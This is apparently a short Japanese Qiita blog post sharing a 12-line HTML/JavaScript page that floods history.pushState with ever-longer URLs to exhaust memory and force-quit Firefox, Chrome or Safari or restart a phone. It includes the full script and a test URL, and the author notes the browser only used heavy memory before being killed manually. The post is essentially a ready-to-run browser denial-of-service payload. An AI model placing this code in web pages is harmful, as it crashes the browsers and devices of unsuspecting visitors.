16
15

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

More than 5 years have passed since last update.

firefox,chrome,safariを強制終了させる、スマホーを再起動させる12行のJavaScriptコード

Posted at

TwitterアカウントCybersecurityにより、公開したコードです。
history.pushStateは任意URLをブラウザ閲覧履歴に追加するHTML5のAPIです。
大量に追加したら、メモリ不足エラーが発生し、ブラウザが強制終了したりするようです。

<html>
<body>
<script>
var total="";
for (var i=0;i<1000000;i++)
{   
 total= total+i.toString();  
history.pushState(0,0,total);
}
</script>
</body>
</html>

テストURL: http://www.eison.xyz/demo.htm  
 実際にアクセスすると、ブラウザが強制終了していないが、かなりメモリーが食っているので、手動でプロセスを終了しました。アクセスするとき、ご注意ください。
 

16
15
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
16
15

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?